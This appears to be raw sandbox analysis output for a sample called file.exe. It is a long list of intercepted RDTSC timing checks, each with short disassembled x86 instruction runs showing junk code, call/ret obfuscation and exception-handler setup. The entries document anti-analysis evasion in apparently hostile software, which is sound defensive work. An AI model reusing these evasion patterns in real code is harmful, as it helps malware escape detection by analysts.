              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 215BC6 second address: 215BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 215BD1 second address: 215BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F466925DD96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007F466925DDA1h 0x00000012 jnp 00007F466925DD96h 0x00000018 pop edi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 215BF6 second address: 215BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 215BFE second address: 215C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 215C02 second address: 215C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 215D41 second address: 215D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F466925DDA0h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21697D second address: 216986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 216986 second address: 21698C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21698C second address: 2169A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4668B9A72Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F4668B9A726h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2169A4 second address: 2169A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2169A8 second address: 2169AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 216DA9 second address: 216DB3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F466925DD9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 217037 second address: 21704D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4668B9A730h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 218768 second address: 21876E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21876E second address: 218774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1E5BC2 second address: 1E5BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F466925DD96h 0x0000000a jmp 00007F466925DDA4h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2194DE second address: 2194E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2194E4 second address: 2194E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2194E9 second address: 2194F3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4668B9A72Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21AD0A second address: 21AD0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21AD0E second address: 21AD12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21AD12 second address: 21AD33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F466925DDA5h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21AD33 second address: 21AD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jc 00007F4668B9A73Ch 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F4668B9A726h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21AD64 second address: 21AD7D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F466925DD96h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21AD7D second address: 21AD87 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4668B9A726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22073F second address: 220749 instructions: 0x00000000 rdtsc 0x00000002 js 00007F466925DD9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220749 second address: 220750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220B9F second address: 220BA9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F466925DDA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220BA9 second address: 220BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4668B9A726h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220E58 second address: 220E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 220E62 second address: 220E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2210BB second address: 2210C5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F466925DD9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 222E0E second address: 222E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 222E14 second address: 222E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F466925DDA1h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 222E34 second address: 222E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223363 second address: 223369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223369 second address: 22336D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22336D second address: 223371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223371 second address: 223391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4668B9A734h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223391 second address: 2233A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223B7B second address: 223B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jp 00007F4668B9A738h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223B8D second address: 223B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 223D04 second address: 223D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 224D5D second address: 224D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F466925DDA1h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22580F second address: 225822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4668B9A726h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F4668B9A726h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2268FA second address: 2268FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 225822 second address: 225845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A734h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F4668B9A726h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2273A8 second address: 2273AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2268FF second address: 226909 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4668B9A72Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 225845 second address: 225849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2297B6 second address: 2297BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A165 second address: 22A183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F466925DDA1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F466925DD96h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A183 second address: 22A187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A187 second address: 22A1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F466925DD98h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 add dword ptr [ebp+122D1E0Fh], ecx 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D2E31h], ecx 0x00000032 mov esi, ebx 0x00000034 push 00000000h 0x00000036 sub dword ptr [ebp+122D282Eh], ecx 0x0000003c xchg eax, ebx 0x0000003d pushad 0x0000003e je 00007F466925DDAEh 0x00000044 jmp 00007F466925DDA8h 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F466925DDA5h 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22B34E second address: 22B354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22E05A second address: 22E064 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F466925DD9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22EFA5 second address: 22EFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4668B9A726h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 231000 second address: 231005 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 231005 second address: 23101D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4668B9A72Ch 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23101D second address: 231031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23559C second address: 2355A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2355A2 second address: 2355A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23654F second address: 23656A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A730h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 235735 second address: 23573A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 235827 second address: 235839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A72Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 237415 second address: 237419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2366A6 second address: 23671F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub dword ptr [ebp+122D1E0Fh], edi 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, esi 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F4668B9A728h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d mov ebx, 08B1F922h 0x00000042 mov eax, dword ptr [ebp+122D113Dh] 0x00000048 and ebx, dword ptr [ebp+1246D681h] 0x0000004e push FFFFFFFFh 0x00000050 or edi, dword ptr [ebp+122D2D04h] 0x00000056 nop 0x00000057 push ebx 0x00000058 push edi 0x00000059 push ebx 0x0000005a pop ebx 0x0000005b pop edi 0x0000005c pop ebx 0x0000005d push eax 0x0000005e pushad 0x0000005f jmp 00007F4668B9A72Dh 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 238435 second address: 23843F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2395B0 second address: 2395B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23762F second address: 237635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2395B4 second address: 2395BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2395BD second address: 2395D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jno 00007F466925DD96h 0x00000012 jnl 00007F466925DD96h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 237635 second address: 23764C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F4668B9A72Ch 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2395D6 second address: 2395E0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F466925DD9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2395E0 second address: 239681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e jmp 00007F4668B9A730h 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a pushad 0x0000001b jmp 00007F4668B9A730h 0x00000020 cld 0x00000021 popad 0x00000022 mov eax, dword ptr [ebp+122D104Dh] 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F4668B9A728h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 mov ebx, 05DB713Bh 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007F4668B9A728h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000019h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 cld 0x00000064 nop 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F4668B9A734h 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C43E second address: 23C445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23A6C5 second address: 23A6CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23A6CF second address: 23A6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23A6D3 second address: 23A6D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23B609 second address: 23B636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F466925DD96h 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007F466925DDA5h 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push ebx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23B6DF second address: 23B6E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23D4BD second address: 23D4C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C649 second address: 23C64F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C64F second address: 23C65A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F466925DD96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C65A second address: 23C704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F4668B9A728h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 jmp 00007F4668B9A736h 0x00000027 push dword ptr fs:[00000000h] 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F4668B9A728h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov dword ptr fs:[00000000h], esp 0x0000004f stc 0x00000050 mov eax, dword ptr [ebp+122D1109h] 0x00000056 push FFFFFFFFh 0x00000058 call 00007F4668B9A739h 0x0000005d mov bh, dh 0x0000005f pop edi 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push eax 0x00000065 pop eax 0x00000066 jmp 00007F4668B9A72Eh 0x0000006b popad 0x0000006c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23B6E5 second address: 23B6E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E5B5 second address: 23E5DE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4668B9A728h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4668B9A739h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E5DE second address: 23E5E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E6CD second address: 23E6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 242808 second address: 242839 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F466925DDA6h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F466925DDA0h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 242839 second address: 24283D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24283D second address: 242843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 246CE9 second address: 246CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
